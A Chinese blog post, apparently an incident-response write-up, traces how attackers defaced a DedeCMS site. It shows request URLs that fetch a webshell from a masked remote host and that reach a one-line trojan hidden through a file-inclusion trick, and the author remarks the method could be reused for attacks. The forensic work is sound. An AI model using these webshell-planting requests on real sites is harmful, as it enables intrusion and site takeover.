ad js.php aid,应急响应实例分享

2024-03-28 06:10

本文主要是介绍ad js.php aid,应急响应实例分享,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.事件简述

某天,发现网站被百度提示页面部分已被非法篡改。

bd23ed6e994fad1ffafddd2a70cbec92.png通过查看百度快照,发现网站首页确实被篡改,插入内容被编码,解码内容如下

98a62b1e64654a37f4ab1e0e232c856e.png从上可确认,网站确实存在页面篡改情况。

2.排查过程

本次的排查过程还是很有趣的,中间还是有好多雷点,首先登录网站管理后台,发现网站首页篡改时间为10月6号。

3fc1724dd28888c2e6282f17769ce617.png通过对日志进行分析发现攻击者通过test.php写入optimized.php后门,写入时间为06/Oct/2019:13:01:36

828fe67e834baa738acd493f1b2f2186.pngtest.php写入时间为2019年10月6号

d52dab2dba02354f7089454927a449ee.pngtest.php具体内容如下,可利用该后门通过访问如下链接

c1a85cb3d2e8c5e15c908fd8c7eed1ba.png//plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt,生成optimized.php大马,访问optimized.php,输入密码可成功登录该木马程序,这也可做为我们日后攻击写马的方法

748fd3764c5801938788b9af8c930810.png在对日志进行进一步分析,来确定test.php是如何写进服务器。开始在日志中发现了如下记录

ebe5219e9b66e56b3b8df1f601197ab6.png看到这个好兴奋呀,结果解码之后才发现不是test.php内容,解码内容如下

8271ef2aef544f510b42ed31d4f3f56f.png在日志中还看到了攻击者还尝试紧接着对moon.php做了一次请求,结果由于没有写进去,系统返回了404。

900784d5e6627e5ba9871fc32a689821.png接着又存在一条,看状态码是写入成功了

911764e29a615e0fe66faff4786f2e7a.png解码内容如下

a62c9fcd5548457c1a07f1201158c7fa.png从日志中可看到在写入成功后紧接着进行了一次访问

255b8b22782a4831ce34f2f6293942fc.png但我尝试访问时,发现mytag_js.php文件已经被删除,由于不能远程登录服务器无法判断文件的改动情况,只能利用现有资源翻目录看日志了。

通过分析查找,在Data /cache目录下发现mytag-511348.html,最早的写入时间可以追溯到2017年。

0293b5cdfd5823cee83c7775e06eb881.png打开该文件内容为含有php一句话菜刀马的html页面

e75c4d56b6ebac84186739c1727ce9fa.png开始以为这只是个含有一句话木马的html,没把他当回事,一个html能有干啥呢,但是当分析日志发现有关于511348的访问记录。

c0ac5322b9b288f4d6d2a9d6e6d1a1a3.png单独的html页面还不足以成为后门,但是通过结合mytag_js.php文件就有了大用处,通过查看源码未发现 mytag_js.php文件,从日志中也可看到之后在对mytag_js.php进行访问,服务器就已经响应404了,可见攻击者已经删除了该文件。

01fb9f3505755af3f6ec6e7a31967816.png从之前的源码备份中找到了mytag_js.php,具体内容如下

6e73b733890c2e1021b74e75be9191c5.png攻击者只需要访问http:// x.x.x.x//plus/mytag_js.php?aid=511348,就可以连接一句话木马了,本地搭建环境测试了下确实可以利用菜刀连接上,从日志中也可以看到确实能连接成功,从数据包的大小,可看到攻击者利用该菜刀马做了一系列操作。

d5de41c0c9f9ed0c9403c870c66d425f.png此处攻击者巧妙的利用文件包含的方式隐藏后门,这确实是种不错的方法,一般很少有杀毒软件会对html的进行查杀。

到此为止就是要进一步排查mytag-511348.html是如何被写入的,接着日志分析,当对日志追踪到9月29中午12:35:58分,在做进一步分析时,未发现29/Sep/2019:11:08:32到12/Jul/2019:09:40:01之间的日志,所以最终也无法确定是通过什么方式上传的第一个恶意文件。由于采用了DedeCMSV57_UTF8_SP2©2004-2011版本,只能从日志中判断出是利用织梦的漏洞对系统实施攻击。

另外在data目录下tplcache目录中还发现了其他的php一句话木马 ,最早的时间基本都可以追溯到17年,建议删除相关目录下后门程序、删除/plus/ad_js.php/plus/mytag_js.php 两个文件、删除data/cache下的缓存文件。

关注我们

Tide安全团队正式成立于2019年1月,是以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号:

这篇关于ad js.php aid,应急响应实例分享的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/854690

相关文章

Redis多种内存淘汰策略及配置技巧分享

《Redis多种内存淘汰策略及配置技巧分享》本文介绍了Redis内存满时的淘汰机制,包括内存淘汰机制的概念,Redis提供的8种淘汰策略(如noeviction、volatile-lru等)及其适用场... 目录前言一、什么是 Redis 的内存淘汰机制?二、Redis 内存淘汰策略1. pythonnoe

java图像识别工具类(ImageRecognitionUtils)使用实例详解

《java图像识别工具类(ImageRecognitionUtils)使用实例详解》:本文主要介绍如何在Java中使用OpenCV进行图像识别,包括图像加载、预处理、分类、人脸检测和特征提取等步骤... 目录前言1. 图像识别的背景与作用2. 设计目标3. 项目依赖4. 设计与实现 ImageRecogni

Window Server2016加入AD域的方法步骤

《WindowServer2016加入AD域的方法步骤》:本文主要介绍WindowServer2016加入AD域的方法步骤,包括配置DNS、检测ping通、更改计算机域、输入账号密码、重启服务... 目录一、 准备条件二、配置ServerB加入ServerA的AD域(test.ly)三、查看加入AD域后的变

Golang操作DuckDB实战案例分享

《Golang操作DuckDB实战案例分享》DuckDB是一个嵌入式SQL数据库引擎,它与众所周知的SQLite非常相似,但它是为olap风格的工作负载设计的,DuckDB支持各种数据类型和SQL特性... 目录DuckDB的主要优点环境准备初始化表和数据查询单行或多行错误处理和事务完整代码最后总结Duck

Window Server2016 AD域的创建的方法步骤

《WindowServer2016AD域的创建的方法步骤》本文主要介绍了WindowServer2016AD域的创建的方法步骤,文中通过图文介绍的非常详细,对大家的学习或者工作具有一定的参考学习价... 目录一、准备条件二、在ServerA服务器中常见AD域管理器:三、创建AD域,域地址为“test.ly”

Spring MVC如何设置响应

《SpringMVC如何设置响应》本文介绍了如何在Spring框架中设置响应,并通过不同的注解返回静态页面、HTML片段和JSON数据,此外,还讲解了如何设置响应的状态码和Header... 目录1. 返回静态页面1.1 Spring 默认扫描路径1.2 @RestController2. 返回 html2

Java操作ElasticSearch的实例详解

《Java操作ElasticSearch的实例详解》Elasticsearch是一个分布式的搜索和分析引擎,广泛用于全文搜索、日志分析等场景,本文将介绍如何在Java应用中使用Elastics... 目录简介环境准备1. 安装 Elasticsearch2. 添加依赖连接 Elasticsearch1. 创

使用C#代码计算数学表达式实例

《使用C#代码计算数学表达式实例》这段文字主要讲述了如何使用C#语言来计算数学表达式,该程序通过使用Dictionary保存变量,定义了运算符优先级,并实现了EvaluateExpression方法来... 目录C#代码计算数学表达式该方法很长,因此我将分段描述下面的代码片段显示了下一步以下代码显示该方法如

将Python应用部署到生产环境的小技巧分享

《将Python应用部署到生产环境的小技巧分享》文章主要讲述了在将Python应用程序部署到生产环境之前,需要进行的准备工作和最佳实践,包括心态调整、代码审查、测试覆盖率提升、配置文件优化、日志记录完... 目录部署前夜:从开发到生产的心理准备与检查清单环境搭建:打造稳固的应用运行平台自动化流水线:让部署像

使用Python实现批量访问URL并解析XML响应功能

《使用Python实现批量访问URL并解析XML响应功能》在现代Web开发和数据抓取中,批量访问URL并解析响应内容是一个常见的需求,本文将详细介绍如何使用Python实现批量访问URL并解析XML响... 目录引言1. 背景与需求2. 工具方法实现2.1 单URL访问与解析代码实现代码说明2.2 示例调用